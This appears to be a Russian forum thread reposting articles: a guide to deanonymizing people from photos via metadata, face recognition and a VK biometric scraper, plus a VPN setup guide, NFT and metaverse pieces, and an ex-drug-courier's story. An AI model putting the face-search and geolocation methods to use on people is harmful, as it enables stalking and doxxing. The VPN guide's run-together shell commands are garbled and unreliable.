Помимо этого, есть еще несколько сервисов для работы с этими данными:
  1. Если на фотографии определилась геолокация, то сайт pic2map покажет на карте конкретное место, где было сделано фото.
  2. С помощью сервиса https://29a.ch/photo-forensics можно определить, подверглась ли фотография монтажу.
  3. SunCalc - уникальный сервис, который с высокой точностью может определить место, где была сделана фотография всего лишь по солнцу. Для этого нужно ввести точно время, когда была сделана фотография.
Основной проблемой метаданных является то, что они зачастую стираются любыми редакторами, не давая возможность разгласить информацию о человеке. А учитывая то, что редакторами пользуются практически все, то шанса их прочесть практически нет. Ко всему прочему EXIF очень просто стереть или изменить самостоятельно с помощью exifpurge.com, поэтому нельзя полностью полагаться на данный метод поиска.

Социальные сети Instagram, Facebook, Twitter, ВК - стирают метаданные, а вот Google+, Google Photo, Flickr, Tumblr - нет.

Поиск по фото

Как бы банально это не звучало, всегда начинайте свой поиск с обычных на первый взгляд поисковиков:

https://yandex.ru/images/

https://images.google.com/

https://go.mail.ru/search_images

https://tineye.com/

https://www.bing.com/visualsearch

Не стоит недооценивать поисковики, их кэш содержит необъятное количество изображений, в том числе и из социальных сетей. Для такого вида поиска вам ничего не потребуется, кроме самой фотографии. Ну, а если поиск не принес никаких результатов, то идем дальше.

Фотография сама по себе уже может содержать полезные в поиске вещи. Обратите внимание на примечательные объекты на заднем фоне, это может быть вывеска, кафе, улица - все, что способно дать подсказку, в какой стране, городе или улице она была сделана.

WolframAlpha может делать много вещей, связанных с технической и исторической составляющей: его применение ограничено только вашим воображением.

Распознавание лица

Существует огромное количество сервисов, по которым вы самостоятельно можете пробить человека по фото. Делимся самыми популярными и рабочими:
  • instadp.com - позволяет скачать полноразмерную аватарку из инстаграма.
  • https://vk.watch/ - поиск информации о человеке ВК, имеет большой архив исторических данных сервиса. Аналог FindFace, который более не работает.
  • Betaface free online demo - Face recognition, Face search, Face analysis - сравнительный анализ фото. Определит вероятность того, что на двух разных фотографиях один и тот же человек.
  • https://tineye.com/ - поиск первоисточника фотографии и всех доменов где она хоститься. Минусом является то, что за результат надо платить.
  • https://www.duplichecker.com/reverse-image-search.php - находит похожие изображения, а так же выдает список сайтов, где есть это фото.
  • https://github.com/solkogan/searchface - сервис скачивает фото пользователей ВК в рамках одного указанного города, и создает базу биометрических данных этих лиц, связывая их с аккаунтами ВК. Отлично работает с маленькими городами. И самое приятное, что за использование не нужно ничего платить.
  • pictriev - определяет возраст человека на фотографии.
  • https://azure.microsoft.com/ru-ru/services/cognitive-services/face/ - сервис от Microsoft Azure предназначенный для сравнения лиц. Нужно лишь перейти по ссылке и вставить два изображения, которые и будем исследовать.
https://i.gyazo.com/8415135d7b7fcd2e...5569987cf2.jpg

Поиск по картам и описанию

Когда вы смогли определить примерный район или приблизительную местность, где была сделана фотография, начинайте исследовать с помощью Google Maps, а именно Street View. Вы удивитесь, но довольно часто такой поиск заканчивается успешно. Спутниковые снимки различных поисковиков - ваш хороший помощник.

https://www.freemaptools.com/ - сервис с расширенными возможностями для поиска на карте.

https://www.openstreetmap.org/ - сайт создан сообществом картографов, которые добавляют и поддерживают данные о дорогах, тропах, кафе, вокзалах и о многих других объектах по всему миру.

Если на фотографии помимо человека есть уникальные объекты, которые можно описать словами, то попытайте свою удачу, введя словесные запрос в поисковике на русском или английском языках.

Но что делать если описать фото не получается? Допустим на заднем фоне виднеются горы, а мы знаем, что объять их количество невозможно. В таком случае на помощь приходит wikimapia.org, где вы можете отфильтровать запрос по всему что угодно. Выберите "показать все горные массивы" и исследуйте карту, пока не найдете нечто похожее, что изображено на фото.

Вывод

Существует большое количество способов пробить человека по фотографии и не только. Это всего лишь верхушка айсберга. Возможности OSINT безграничны.

Если вы еще не ознакомились в предыдущими статьями на тему деанона, то советуем сделать это прямо сейчас:
  • https://telegra.ph/Nazovi-mne-svoe-i...heloveka-02-22
  • https://telegra.ph/Nazovi-mne-svoe-i...m-setyam-02-27


https://telegra.ph/Kak-probit-chelov...tografii-03-04

BlackMAST 24.03.2022 18:25



https://i.gyazo.com/3daf515390f16712...21ef8a61c5.jpg

Инструкция по созданию собственного VPN-сервера

Вступить в наш чат

Цитата:


Хотите защитить и скрыть свой трафик от провайдера, хакеров и спецслужб, а также получить доступ к заблокированным сайтам в вашей стране? Способ один - VPN. Если вы цените приватность и анонимность своих действий в интернете, то использование VPN - лучшее решение. И исполнить его можно 2 путями:


  • Выбрать VPN-провайдера. Это самый простой и оптимальный вариант, если вы не хотите вникать в процесс создания сервера. К тому же, вы, должно быть, уже знакомы с ТОП-5 лучших провайдеров, если нет, то кликайте тут.
  • Создать свой VPN-сервер.

https://i.gyazo.com/bd1ca5b04e0db612...d32a8c7cd5.jpg

Если вам интересно попробовать себя в роли программиста или вы хотите освежить знания, то предлагаю сегодня разобраться, как создать свой VPN-сервер. Настройка не предполагает конкретные знания в этом деле, все что вам нужно - это желание и свободные 15 минут вашего времени.

Пробежимся по основным + и - своего VPN-сервера.

Плюсы:
  • неизменная скорость;
  • вы один на IP-адресе;
  • независимость от VPN-сервисов.
Минусы:
  • создание требует навыков;
  • высокая вероятность хакерской атаки на сервер.

Выбор страны для VPN-сервера

При выборе страны обычно руководствуются следующими критериями:
  • расстояние до вас: чем ближе страна, тем выше скорость соединения, и наоборот.
  • отсутствие запретов: доступность всех сервисов.
  • отношения стран: важно, чтобы между вашей страной и страной, где будет VPN-севрер была минимальная политическая напряженность. Но с другой стороны, эта же напряженность может сыграть вам на руку. Например, многие российские пользователи выбирают расположение своего VPN-сервера в Великобритании как раз из-за высокой напряженности между странами, если что-то произойдет, то последняя ни за что не сольет трафик российским спецслужбам.
Цитата:


Российским пользователям лучше всего остановить выбор на странах Евросоюза.


Выбор протокола

VPN протокол - это свод правил, которые определяют какой тип соединения будет между вашим устройством и VPN-сервером.

Существуют следующие виды протоколов:
  • OpenVPN
  • PPTP
  • L2TP
  • IKEv2
Цитата:


Мы же советуем выбрать OpenVPN, который используется в качестве основного практически всеми VPN-сервисами.


Как создать свой VPN-сервер

1. Выбираем хостинг для VPN-сервера

Для создания своего VPN-сервер, нам в первую очередь нужно арендовать виртуальный выделенный сервер (Virtual Private Server) у хостинг-провайдера. Самыми популярными хостинговыми сервисами являются:

► Amazon Web Services

► DigitalOcean

► Hetzner

► Vultr

► Bluehost

► Arubacloud

2. Настраиваем OpenVPN

Как только вы арендовали VPS-сервер, требуется подключиться к нему с помощью данных авторизации по SSH. Сделать это можно с помощью PuTTY.

Затем открываем консоль нашего сервера и прописываем команды в таком же порядке:

apt-get update&&apt-get upgradeapt-get install gitcd/rootgit clonecd openvpn-install****d + x openvpn-install.sh./openvpn-install.sh

Если вы вели все команды верно, то у вас должен запуститься специальный скрипт, настраивающий сервер автоматически. Во время настройки вам лишь нужно будет давать согласие, а в конце создать имя клиента.

3. Подключаемся к VPN-серверу

Итак, теперь на VPS-сервере есть файл с расширением .ovpn, который нужно переместить на то устройство, где будет подключен VPN.

4. Устанавливаем программу OpenVPN

OpenVPN требует установки своего приложения, поэтому переходим на официальный сайт и скачиваем. OpenVPN поддерживает:

https://i.gyazo.com/9ed129728a659d63...2b76d5ded2.jpg

После установки нам нужно подключиться к нашему VPN-серверу, используя ранее созданные файлы с расширением .ovpn.

Заключение

Таким образом, мы научились настраивать VPN-сервер, который полностью защищен и недоступен ни для провайдера, ни для недоброжелателей. Теперь вы можете не беспокоиться о своей анонимности, подключаясь к Wi-Fi. Стоит отметить, что если вы много путешествуете, то вы можете создать неограниченное количество VPN-серверов и подключаться к любому из них в зависимости от вашего местоположения: это даст дополнительный уровень защиты и увеличит скорость соединения.

Дополнительные материалы к статье:
  1. VPN от А до Я
  2. VPN на роутере: что это такое и как настроить
  3. Учимся взламывать Wi-Fi всего за несколько шагов

https://telegra.ph/Instrukciya-po-so...-servera-02-08

BlackMAST 24.03.2022 18:32

https://i.gyazo.com/85afcc6ec388ba0e...f3792f8587.jpg

Бум цифрового искусства NFT

Вступить в наш чат

Несмотря на то что NFT появились на свет в 2017 году, настоящий фурор произошел только в 2021 году. Оборот NFT за текущий год составил $22 млрд, а в 2020 достиг всего $100 млн. Связано это с тем, что многие люди видят в NFT популярный тренд и идут на его поводу. В 2021 году каждая вторая знаменитость, компания выпустили свои уникальные токены на продажу. Так, человек, ранее далекий от мира криптовалют, изъявил желание приобрести или создать свой собственный NFT. В предыдущей статье мы с вами разобрали, что лежит в основе NFT, как его создать и т.д.

Сегодня же мы с вами поговорим о самых дорогих токенах, которые принесли миллионы долларов своим владельцам и разберемся в феномене популярности и ценности.

Что же продают в виде NFT?

Мы можем разделить NFT-токены на 4 большие группы:
  • Игры. Это могут быть уникальные персонажи, виртуальные участки земли, необычные карточки. Данная категория отличается от других тем, что вы можете найти применение купленным вещам в игре.
  • Искусство. Аналог традиционным произведениям: пиксельные картинки Nyan Cat, Бэнкси, скучающие обезьяны и многое другое.
  • Предметы коллекционирования. Аватарки, карточки, фигурки и другие штуки для пополнения виртуальной коллекции. Ажиотаж вокруг них происходит по той причине, что выпускаются они в ограниченном тираже.
  • Социальные токены. Они включают в себя личные токены и токены сообщества. Последние используются для членств или сообществ. Таким образом, если вы покупаете такой токен, то вам открывается доступ к приватным чатам в Telegram, серверам Discord и т. д. Создатели также зачастую поощряют держателей токенов, устраивая различные конкурсы.


Вашему вниманию представлен ТОП-10 самых дорогих и необычных NFT-токенов. Приготовьтесь удивляться!

Одной из первых громких сделок стала продажа гифки летящего кота с туловищем из печенья Nyan Cat.

https://i.gyazo.com/35a06b9d9f082c7f...13fc1306fc.jpg

Создателю сего шедевра Крису Торресу посчастливилось заработать 300 ETH, на сегодняшний день это более 90 млн рублей. Торрес немного видоизменил оригинал и улучшил разрешение.

https://i.gyazo.com/d9a8d2b80b921976...b578d151cd.jpg

Бипл продал самый дорогой NFT за всю историю, который он собрал в виде коллажа "Каждый день: первые 5000 дней". Художник рисовал каждый день по картине, после чего объединил их в 1 NFT, который продал на аукционе за $69.3 миллионов.

https://i.gyazo.com/86122b15d94b1b58...1da9a8739e.jpg



CryptoPunks - еще одна из нашумевших коллекций. Она состоит из десяти тысяч аватаров, на которых изображены панки с разными отличительными чертами.

https://i.gyazo.com/a80a29d9af328e92...0614251673.jpg

Самым дорогим NFT из коллекции на данный момент считается панк под номером 7523, именуемый "Чужой", его продажа принесла $11,8 млн.

https://i.gyazo.com/b32aa175f14a06eb...d45d55f83e.png

Панки под номерами 7804 ($7.6 млн) и 3100 ($7.67 млн) тоже не обошлись без особого внимания.

Серия NFT Bored Ape Yacht Club состоит из 10000 обезьян с непохожими образами: очки, повязки, головные уборы, аксессуары, даже пирсинг. Приобрести токен из коллекции значит стать членом почетного клуба. На сегодняшний день покупатели уже оценили некоторые привилегии, такие как бесплатные бонусные NFT и доступ к эксклюзивным товарам.

https://i.gyazo.com/53f47fa1f669f2ca...c696475c88.jpg

Минимальная цена за токен с обезьяной начинается от 59,0 ETH, а максимальная достигает 769,0 ETH. В сентябре набор из 101 NFT из данной коллекции ушел на аукционе за $24,4 миллиона.

В недавнем времени произошел конфуз из-за того, что владелец допустил ошибку при выставлении цены, и вместо $300 000 продал NFT под номером 3547 за $3000. Опечатка была замечена, когда токен уже был куплен. Новый держатель уже выставил обезьяну на продажу, но уже за $321 000.

https://i.gyazo.com/de10cb693b2aff8c...d815333358.jpg

Если панки и обезьяны вас не удивили, то посмотрите на следующие NFT-токены, которые также ушли за крупную сумму.

EtherRock - серия, состоящая из сотни одинаковых камней, которая была выпущена в 2017 году.

Так, камень под номером 21 недавно был продан за 45 ETH ($176 614 по нынешнему курсу).

https://i.gyazo.com/6edbfbed8cafdde0...ee4dfc1dbf.jpg

Это не единственный проданный камень, общий объем торгов превысил $15,5 млн.

В интернете вы даже можете найти пошаговые "обучалки", как лучше и выгоднее купить NFT EtherRock.

Сжечь картину, чтобы превратить ее в NFT. Такая участь постигла картину Бэнкси "Morons". Сожжение картины транслировалось online в YouTube и Twitter. После уничтожения был создан NFT-токен, ставший первым токеном, перенесенным из материального обличия в виртуальное. Этот ритуал был необходим для того, чтобы уничтожить оригинал и таким способом передать статус подлинника NFT. Он был продан за 228,69 ETH ($917 668 по курсу на момент написания).

https://i.gyazo.com/8349a1f1f0c2bbcf...cb73e98ec0.jpg

⑦Crossroad - еще одно творение художника Бипл, представляющее из себя 10 секундное gif-изображение с оголенным Дональдом Трампом в парке. Резонанс этой картинки в том, что она могла бы измениться в зависимости от результатов выбором, то есть мы имели бы либо нынешнее изображение, либо с Трампом победителем.

https://i.gyazo.com/1bca10d79b35278d...cda91f5dec.jpg

Продажа принесла $6.6 миллионов и сделала Crossroad одним из самых дорогостоящих токенов.

Певица Граймс выставила на аукцион серию работ, которые создала в сотрудничестве со своим братом Маком Бушером. Граймс заработала $5,8 миллиона менее чем за 30 минут, продав 10 NFT под названием "WarNymph". Некоторые работы были в единственном экземпляре, а другие - тиражом в сотни копий. А пиар-менеджером выступил ее муж Илон Маск, который опубликовал пост в твиттере.

https://i.gyazo.com/02fba0f85ad60f06...aa891926a9.jpg

Новые держатели NFT снова продают многие работы, но теперь уже за $2,5 млн.

Дом, в котором нельзя жить Mars House.Это первый виртуальный дом, который был выпущен в виде NFT. Создательница дома на Марсе Криста Ким продала NFT-токен за $500 000. "Войти" в дом можно с помощью шлема виртуальной реальности, загрузив файл в 3D-модели.

https://i.gyazo.com/05d4a5359a189bdd...21d07d776a.jpg

Это не единственный дом в виртуальной реальности, появляется все больше и больше желающих инвестировать в виртуальную недвижимость.

Участок в игре Axie Infinity «Genesis» Estate за $1,5 млн. Да, вы не ослышались. Покупатель приобрел 9 участков, которые обошлись ему в кругленькую сумму. Помимо земель в этой игре к покупке еще доступны различные уникальные персонажи Axies, которых вы можете покупать, выращивать, разводить и продавать в виде NFT.

https://i.gyazo.com/ab71eb92411210ac...82d8390e1f.jpg

Ценность NFT

Возникает вопрос: "Для чего нужно покупать картину хоть и известного художника, если ее можно скачать бесплатно?"

Ответ прост - скачанная картинка не может принести прибыль, а NFT может. Так, ценность работы Бипла "Crossroad" выросла с $582 000 до $6.6 млн. NFT, как и любой другой актив имеет свойство дорожать, поэтому многие покупатели инвестируют в NFT с целью дальнейшей продажи, но уже по более высокой цене.

Нет четких правил за сколько следует покупать и продавать NFT, но есть несколько ключевых моментов, на которые стоит обращать внимание:
  1. Известность - основной принцип при покупке NFT. Очевидно, что NFT, выпущенное популярным художником более ценно, чем NFT от no-name создателя.
  2. Редкость. NFT в единственном экземпляре представляет большую ценность, чем в N-тираже.
  3. Объем транзакций. Обращайте внимание на транзакционную активность, NFT с высокой активностью способствуют получению наибольшей прибыли.
Вывод

Логика покупателей, которые приобретают токены по бешеной цене проста: если что-то выпускается в лимитированном количестве, то в последствие оно будет только дорожать - к примеру, как и в ситуации с BTC. Но в данный момент мы наблюдаем спад биткоина, и никто точно не знает, что же с ним будет дальше. NFT, как и любая другая криптовалюта, не дает никаких гарантий вашей прибыли. Существует огромный риск понести убытки в случае, если ажиотаж вокруг NFT угаснет. Но пока цифры демонстрируют нам обратное: популярность и продажи растут, а знаменитости то и дело выпускают очередной NFT-токен.

https://telegra.ph/Bum-cifrovogo-iskusstva-NFT-03-09

BlackMAST 24.03.2022 18:39

https://i.gyazo.com/de08cc2733007d92...32aa016c07.jpg

Будущее за NFT и метавселенными?

Вступить в наш чат

Будь то MMORPG, конференция в Zoom или онлайн концерт любимого исполнителя, людям давно не нов виртуальный мир. Но с недавнего времени стала набирать обороты новая технология, именуемая как "метавселенная", хотя она схожа с концепцией многопользовательских игр - это намного больше, чем просто ролевая игра - это целый виртуальный мир.

Цитата:


Термин метавселенной возможно покажется для вас новым и незнакомым, но это не так, вы точно должны знать о чем идет речь. Теперь у вас возникает вопрос о том, что же все-таки представляет из себя метавселенная. Для того, чтобы ответить на него достаточно обратиться к истокам происхождения этого термина. Изначально понятие метавселенной появилось в книгах писателей-фантастов: в романе "Лавина" Н. Стивенсона оно обозначает виртуальный мир, который поражает своей схожестью с физической реальностью. Вслед за книгами стали появляться и другие известные для нас произведения "Матрица", "Аватар", "Первому игроку приготовиться".

https://i.gyazo.com/e4cca2f1794d73e1...82841d9a11.jpg

Но причем тут наш мир? Неужели фантастика становится реальностью? Давайте обо всем поподробнее.

Связь метавселенной и NFT

Эти два понятия зачастую неправильно понимаются и путаются в сознаниях людей, поэтому очень важно их различать. Для этого давайте дадим им определения.

Цитата:


Что такое NFT

NFT - это невзаимозаменяемые токены или, проще говоря, криптовалюта, которая хранятся в блокчейне.
NFT бывают в виде изображений, видео, аудио, коллекционных предметов в играх или любых других виртуальных объектах. Запись о владении NFT сохраняется в блокчейне, и её можно обменять на цифровые активы. Хотя NFT могут с легкостью быть скопированы и сохранены, это не будет являться "оригиналом", право собственности остается за владельцем, купившим NFT. Эта особенность и отличает невзаимозаменяемые токены от любой другой криптовалюты, поэтому NFT лежат в основе роста метавселенной.
Больше познавательной информации про NFT читайте в это статье.

Цитата:


Что такое метавселенная

Термин «метавселенная» можно разделить на две части - "мета" и "вселенная", где "мета" значит "за пределами". Иначе говоря, метавселенная - это новая дополнительная реальность за пределами вселенной или же параллельная виртуальная вселенная, существующая одновременно с реальным миром.
Метавселенная - это следующий уровень в развитии компьютерных технологий. На данный момент нет четкого представления, как она будет выглядеть в конечном итоге. Но уже сейчас присутствуют очки и гарнитуры виртуальной реальности, которые помогают полностью погрузиться в образ виртуального аватара.

Цитата:


Связь

Ключ к метавселенной можно найти в цифровой валюте, а именно в невзаимозаменяемых токенах. NFT дают права собственности на цифровые активы, например, вы можете использовать их для покупки и продажи виртуальной недвижимости, произведений искусства, билетов на концерты, путешествия. Так, NFT используются в метавселенных для преобретения собственности, которая дает право верифицированного цифрового владения. Главным катализатором метаэкономики является то, что любые цифровые товары можно купить и продать по усмотрению пользователей.

Метавселенные и компании

Компании гиганты уже давно проявили свой интерес к метавселенным. Только Цукерерг на проект метавселенной анонсировал $10 млрд и задействовал 10.000 сотрудников Facebook. И это далеко не единственная корпорация, заинтересованная в освоении метавселенной. Epic Games, Amazon, Microsoft, Unity и другие компании тоже делают свой вклад в развитие новой технологии. Даже YouTube задался целью создать собственную метавселенную и дать возможность видеоблогерам зарабатывать на ней с помощью NFT.
Предполагается, что вскоре мы будем учиться, работать, общаться и посещать различные мероприятия в метавселенной.
На данный момент самыми известными примерами метавселенной, хотя и в ограниченных формах, являются платформы виртуальной реальности Decentraland и Sandbox.

Зачем компании вкладывают $ млрд в метавселенную?

Бум вокруг метавселенной начался в 2021 году, тогда цены на виртуальную недвижимость выросли на 3000 %. Конечно же, большую роль сыграла изоляция, которая внесла свои коррективы в привычный уклад вещей. Огромное количество компаний перешли на удаленку - офисы опустели, а недвижимость упала в цене. Именно по этой причине все внимание компаний переместилось на виртуальную реальность. Цены на цифровую землю растут с каждым днем, а мировые гиганты открывают в метавселенных свои офисы.

Отличие метавселенной от игры:
  1. Бесконечное существование. Метавселенная существует как полноценная реальность, поэтому она никогда не останавливается и не заканчивается.
  2. Нет ограничений. Каждый человек может оказывать влияние на метавселенную, менять, создавать что-либо. Также нет никаких лимитов на количество пользователей.
  3. Своя экономика или метаэкономика. Вы можете покупать, продавать, создавать и обменивать любые товары.
  4. Объединяет виртуальный и физический миры.
  5. Совместимость данных. Пользователи могут перемещать данные в виртуальных мирах. Например, перенести авто из GTA в Need for Speed.
Перспективы

Вот несколько основных идей метавселенных, которые выделил Марк Цукерберг:
  1. Виртуальное пространство. Главной особенность метавселенной будет возможность переместиться в виртуальное трехмерное пространство. У вас будет создаваться ощущение, что все что происходит вокруг реально.
  2. Общение. В будущем никто не будет разговаривать по телефону, вместо этого вы будете общаться с рядом сидящей голограммой.
  3. Рабочий стол. Нужно создать рабочую обстановку, находясь при этом в кафе - легко. Вы увидите перед собой монитор с папками и ярлыками, так, как если бы вы работали дома или в офисе мечты.
  4. Собрания. Вместо Zoom уже сейчас в США, по словам Марка, многие проводят собрания в VR. А в дальнейшем, если получится, - будут в метавселенной.
  5. Бракосочетания. Первая церемония заключения брака уже состоялось в метавселенной Decentraland. Свидетельство о браке было выдано в виде NFT. Также процесс токенизации прошли и обручальные кольца пары.
Вывод

Последние пару лет сыграли огромную роль в зарождении метавселенной. Из фантастических романов и фильмов метавселенная переместилась в реальность, хоть и в самое начало ее развития. Трудно предугадать, сможем ли мы увидеть ее в том виде, в котором она существует в "Матрице" или "Первому игроку приготовиться", но мы точно можем сказать, что технологии развиваются, а интерес безусловно растет.
Велика вероятность, что метавселенная приобретет форму, о которой мы еще даже не догадываемся.
Если вы возлагаете большие надежды на метавселенную, то самое время вкладываться в цифровую недвижимость. О том, как приобрести NFT-землю вы узнаете в следующей части.

https://telegra.ph/Budushchee-za-NFT...elennymi-03-03


BlackMAST 24.03.2022 18:41


Как купить NFT-землю

Вступить в наш чат

Современный мир диктует новые правила - виртуальная реальность заменяет физический мир, компании вкладывают миллиарды долларов в развитие метавселенной, а простые пользователи покупают виртуальные участки земли в виде NFT-токенов. Очевидно, что спрос на цифровую землю растет с каждым днем подобно рынку реальной недвижимости. Если вы все-таки решили всерьез задуматься над покупкой, то просто следуйте руководству.

https://i.gyazo.com/b55bd624beb265de...a3d9f54a7b.png

Что такое NFT-земля

NFT-земля - виртуальный участок в метавселенной с уникальным правом собственности, поскольку земля прикрепляется к конкретному NFT. Приобретая такую землю, вы можете открыть для себя доступ в развивающейся метавселенной и исследовать участок с помощью аватара или же перепродать его дороже, сдать в аренду. Не менее популярным вариантом использования NFT-земли является проведение ивентов, конференций. Также многие пользователи покупают земли для того, чтобы получить бонусы внутри игры.

Как купить NFT-землю в метавселенной

Покупка NFT-земли ничем не отличается от приобретения любого другого невзаимозаменяемого токена.

Сделать это можно 2 способами:
  • на распродаже проекта;
  • на NFT-маркетплейсах.
Что нужно:
  • цифровой кошелек;
  • криптовалюта.


Выбираем платформу

Первым действием нужно определиться с метавселенной, поскольку их отличают различные возможности. Выделяют на данный момент следующие платформы виртуальной реальности: Decentraland и Sandbox.

Мы для примера возьмем метавселенную The Sandbox на Ethereum.

Подключаем кошелек к The Sandbox Marketplace

Самыми подходящими вариантами являются кошельки Binance Chain Wallet и MetaMask. После того, как настроили один из них, то заходим на The Sandbox и смотрим на карте доступные участки земли. Некоторые из них можно купить непосредственно через The Sandbox Marketplace, а другие на сторонних биржах, таких как OpenSea. В нашем примере мы будем делать через The SandBox.

На главной странице SandBox в верхнем правом углу выберите "Sign In". Убедитесь, что кошелек настроен на блокчейн проекта, в данном случае Ethereum.Затем нажимаем на "Metamask".

https://i.gyazo.com/790e163b74ab0299...5d06f3e4f0.jpg

После чего появится всплывающее окно, где нужно подтвердить подключение, нажав "Next".

https://i.gyazo.com/0c4b7b38e2c21fdc...04ecb81d2e.png

Cледующим шагом подключаемся к аккаунту, выбрав "Connect".

https://i.gyazo.com/01a698667641482b...420d08f473.png

Учетная запись практически готова! Осталось указать email, никнейм, пароль и нажать "Continue". И завершаем создание аккаунта с помощью кнопки "Sign".

Готово. Теперь на сайте у вас появился баланс и аватарка.

https://i.gyazo.com/7bbcc991f52ff527...b0d177f313.png

Покупаем ETH на Binance

Для того, чтобы купить участок нам понадобится криптовалюта - эфир, так как The Sandbox чаще всего принимает только его. Эфир вы можете приобрести на Binance с помощью кредитки.

https://i.gyazo.com/bd65e12ffed6e86a...f568133c8a.png

Далее нужно перевести активы на криптокошелек. Скопируйте публичный адрес криптокошелька и введите его в качестве адреса для вывода средств.

Выбираем участок

Отсортируйте участки с помощью фильтров. Поскольку значительная часть земель The Sandbox уже куплена, их можно купить только на OpenSea. Однако некоторые участки пока еще можно приобрести через карту The Sandbox. Кроме того, эта карта - отличный способ, чтобы удостовериться, что вы приобретаете надежную NFT-землю, так как ссылки OpenSea включены в интерфейс.

https://i.gyazo.com/7ce2c2c8cba593bd...9aaf493135.png

Как только определитесь с землей, выберите "Bid", чтобы поторговаться или купите по указанной цене.

https://i.gyazo.com/83e3eac76b8353ea...22e7c98210.png

Продаем NFT-землю

Продать участок можно 2 способами:
  • на маркетплейсе метавселенной;
  • на сторонних торговых площадках.
В данный момент платформой Sandbox не предусмотрена прямая продажа. Для этого вам придется воспользоваться услугами вторичного рынка. Например, на OpenSea достаточно зайти в свой профиль, выбрать нужный NFT и нажать "Sell".

Что касается аренды участка, то в данный момент на Sandbox нельзя этого сделать официально и безопасно. Некоторые пользователи сами договариваются с арендаторами без поддержки сайта, но зачастую это заканчивается печально.

Вывод

Любая покупка подразумевает возможные риски, поэтому взвесьте все за и против перед тем как купить NFT-землю. Обязательно изучите метавселенную, в которую вы инвестируете и доверяйте только проверенным маркетплейсам.

Дополнительные материалы к статье:
  • NFT - феномен в мире криптовалют
  • Бум цифрового искусства NFT
  • Как NFT изменили жизнь Павла Сказкина: путь от наркокурьера до успешного художника
  • Будущее за NFT и метавселенными?


https://telegra.ph/Kak-kupit-NFT-zemlyu-03-03

BlackMAST 24.03.2022 18:43


Как NFT изменили жизнь Павла Сказкина: путь от наркокурьера до успешного художника

Вступить в наш чат

Цитата:


Знакомьтесь, Павел Сказкин, он же заключенный художник, успешно продающий свои NFT. Сегодня мы расскажем о его пути от даркнета до художника невзаимозаменяемых токенов.

От даркнета до тюрьмы

Как же Павел Сказкин докатился до такой жизни - в середине 2010-х площадки по продаже наркотиков в даркнете были наиболее востребованы:

"Внезапно появилась крипта, нижний интернет, теневые рынки, даркнет, - вспоминает Павел. - Я стал отовариваться там. В какой-то момент я набрел на объявление, что требуются сотрудники. Закончилось это тем, что я нахожусь тут". Работать он стал администратором в RAMP, продавая запрещенные препараты. О том как все происходило, он рассказывает:

"Товары и услуги прямиком из дьявольского сундука: все, что нельзя купить в обычном магазине, можно достать в даркнете (или можно было, на сегодняшние реалии не могу сказать). Сделки на площадках происходят по схеме: покупатель-гарант(площадка)-продавец. Отправленные покупателем средства поступают не напрямую к продавцу, а к гаранту, который получает комиссию за свои услуги. После подтверждения состоявшейся сделки обеими сторонами, средства отправляются гарантом продавцу".После должности администратора Павел решил попробовать себя в роли наркокурьера, и как результат оказался на зоне. Срок он получил - 6 лет лишения свободы с отбыванием наказания в колонии строгого режима за попытку распространения веществ запрещенных законодательством РФ в особо крупном размере, а именно марихуаны.

В тюремной библиотеке Сказкин изучил Уголовный Кодекс и сам подал прошение о смягчении наказания:

"Затянулось это на 11 месяцев и 5 судебных заседаний. В первых трех инстанциях суды отказывали мне и только после того, когда я дошел до Верховного суда РФ удалось получить положительное решение. Летом 2021 года я первый раз за 4 года и 6 месяцев вышел на свободу, увидел жену, маму и отправился в исправительный центр. Здесь у меня был доступ к гаджетам, и это существенно изменило мою жизнь".

Рисование = спасение

Рисование всегда было главным хобби для Павла. Рисовать он начал еще в детстве, но никогда не мог подумать, что в будущем его талант сыграет ему на руку. Так вышло, что его увлечение стало единственной отдушиной и спасением в тюрьме. Другие заключенные сразу же признали талант художника:

"Навыки рисования пригодились мне в местах лишения свободы, я рисовал на простынях, на досках для нард, делал открытки для других осужденных, рисовал стенгазеты по поручениям сотрудников исправительного учреждения. Ну и для себя я рисунки делал, просто потому что мне нравится. Отправлял детям, потому что подарков я никаких сделать не мог».Очень тяжело Сказкину давался информационный голод, поэтому для того, чтобы быть в курсе всех новостей, он выписывал доступные заключенным журналы. Именно из журналов и газет он узнал о NFT-токенах, так и зародилась идея попробовать себя в новом направлении, ведь многие эксперты заявляли, что будущее цифровых технологий за виртуальными мирами.

NFT

Встреча с Ильей Орловым в одном из телеграмм-каналов о NFT оказалась судьбоносной:

"Найдя русскоязычный чат об NFT, я стал расспрашивать пользователей о токенах, и в одной из бесед отправил в чат фото с колючей проволокой, на что получил массу вопросов. Именно тогда меня и заметил Илья. Попросил рассказать свою историю и показать рисунки. На тот момент я продал несколько своих NFT за 2-5$. Средств для размещения на дорогих и полузакрытых площадках у меня не было. Илья, поверивший в меня и в уникальность моей истории, проявил сумасшедший интерес к тому, что я делаю и взял на себя все финансовые затраты и продвижение моих работ".Он решил, что многих людей покорит история Павла, поэтому основным лейкмотивом его творчества и NFT в том числе выбрал тему заключения. Он решил, что акцент в позиционировании художника с никнеймом papasweeds нужно делать на истории его заключения: «Я жил на Западе, и я понимаю, что они там очень любят Достоевского за всю эту глубину, за боль. Они и Pussy Riot полюбили за то, как их ранила власть. И это для них как театр и шоу, которое продается. Я подумал, ну почему нет? Мы поможем Паше. Мы раскачаем проект».

Так художник под никнеймом papasweed и Илья Орлов всего за пару месяцев продали NFT на сумму более чем на 1 миллион рублей, 30 процентов от которых пошли на благотворительность "Руси сидящей".

NFT-токены Павла Сказкина

Первым NFT стала работа под названием "Hall of Shame" или "Зал стыда", на переднем плане которой мы видим полуобнаженного судью с молотком и пакетом с конфетами, а на заднем плане сидит плачущий ребенок. Продана эта работа была за 1 эфир или 2 881,04USD по нынешнему курсу.

Сам Павел Сказкин метафорично описал данную работу:

"Каждый приговор, произнесенный в зале суда, похож на смертный приговор. Годы вашей жизни мгновенно отнимаются. Я чувствовал себя беспомощным, уязвимым ребенком. Стыд, который я чувствовал перед женой и детьми, убивал меня. Я все смотрел на ее слезы и с трудом удерживался от слез, но на самом деле это могли быть слезы радости. Я повторяю себе: "Слава богу, прошло не десять лет", как будто это была проклятая мантра. Российская тюрьма - ужасное исправительное учреждение, призванное стыдить и ломать людей. Я пять лет изучал их учебную программу и скоро закончу".Вторая работа с названием "Испорченное" не менее поражает своей картинкой и душераздирающем описанием.

https://i.gyazo.com/f0fffbbf66c51942...4000dcbcc7.jpg

